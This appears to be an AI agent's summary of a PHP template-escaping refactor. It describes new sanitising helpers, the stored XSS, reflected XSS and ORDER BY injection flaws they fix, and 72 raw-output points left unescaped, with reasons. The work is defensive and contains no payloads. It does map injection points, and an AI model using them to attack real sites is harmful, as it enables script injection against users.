  {{ }} compiles to e(), and e() leaves Htmlable values untouched. So the replacement for {!! is not "escape harder in the template" — it's move the safety decision into PHP and return HtmlString. That is testable, and it can't 
  double-encode.

  New helpers in core/functions/helper.php:

  ┌──────────────────────────┬──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────┐   
  │          Helper          │                                                                                               For                                                                                                │   
  ├──────────────────────────┼──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────┤   
  │ safe_html($v)            │ Stored text allowed to carry formatting. Escapes everything, then restores a fixed list of attribute-free tags. Because the restore runs on the already-escaped string and matches only a tag    │   
  │                          │ name + optional slashes, onerror=, href="javascript:" and <script> can never come back. double_encode=false, so rows containing &amp; keep their meaning.                                        │   
  ├──────────────────────────┼──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────┤   
  │ icon_markup() /          │ Theme icons — SVG passes through, a class list is escaped into class="…".                                                                                                                        │   
  │ icon_html()              │                                                                                                                                                                                                  │   
  ├──────────────────────────┼──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────┤   
  │ sort_direction() /       │ Normalise $_REQUEST['dir'] / ['sort'].                                                                                                                                                           │   
  │ sort_column()            │                                                                                                                                                                                                  │   
  ├──────────────────────────┼──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────┤   
  │ js_json()                │ Now adds JSON_HEX_TAG (a lexicon containing </script> used to close the script element) and returns HtmlString.                                                                                  │   
  └──────────────────────────┴──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────┘   

  Plus ManagerTheme::styleHtml() / lexiconHtml() (lexicon markup kept, substituted values escaped), and EventLog::descriptionHtml().

  Real bugs fixed, not just syntax

  - Stored XSS, Event Log ({!! $log->description !!}). logEvent() messages contain HTML from plugins, failing queries and unauthenticated requests. Sanitising happens on read, because rows written before this fix already carry  
  payloads. descriptionHtml() also strips the base64 mail-body comment marker first — escaping without that would have printed the blob as visible text.
  - Stored XSS, element/module/TV/role descriptions (10 views) and $module->icon breaking out of class="…".
  - Stored XSS, password_msg: the username was interpolated raw into a lexicon entry containing <b>. Now assembled in EditOrNewUser with escaped replacements, handed to the view as HtmlString — the generated password stays      
  readable.
  - Reflected XSS + ORDER BY injection, page/3.blade.php: $_REQUEST['id'] went into a JS string literal, dir/sort went into orderBy() and into generated links. Now (int) / sort_column() / sort_direction(), and the JS handlers   
  use @js().
  - Double encoding removed: Search::getTemplates() pre-escaped titles that the view then escaped again; same for the frame username.
  - CSS url() breakout on the user photo; username: '{{ … }}' inside <script> (entities aren't decoded there — an apostrophe corrupted the value).

  Where it is not possible (72 remaining)

  1. Plugin / event output — 20. get_by_key($events, 'On*FormRender'), OnManagerFrameLoader, OnRichTextEditorInit. Third-party plugins return HTML and JS by contract; escaping breaks every RTE and every form-extending plugin.   
  Unfixable without a plugin API change.
  2. Form component slots — 32 (manager/views/form/*). $label, $attributes, $comment, $element are attribute strings and HTML fragments built by controllers. Fixing these means changing the component contract (attribute arrays  
  instead of pre-rendered strings) — a separate, larger refactor.
  3. Registered scripts / loaders — 5. getRegisteredClientScripts(), getRegisteredClientStartupScripts(), loadDatePicker(), Tracy\Debugger::renderLoader(), getMainFrameHeaderHTMLBlock(). These are <script> tags.
  4. Whole generated documents — 4. phpinfo(), sysinfo HTML, cache log, the welcome chunk (makeTemplate) — user-authored template content by design.
  5. Internally generated tables/menus — 8. MakeTable output, context menus, $docBlockList, tab HTML. Convertible later by making those producers return HtmlString; I left them because it changes MakeTableInterface. Their inputs
  are already escaped.
  6. Pre-encoded JSON islands — 3. $defaultProperties, $internal, $contextMenu['script']. @js() would double-encode them, so I hardened the json_encode() calls at source with JSON_HEX_TAG instead.
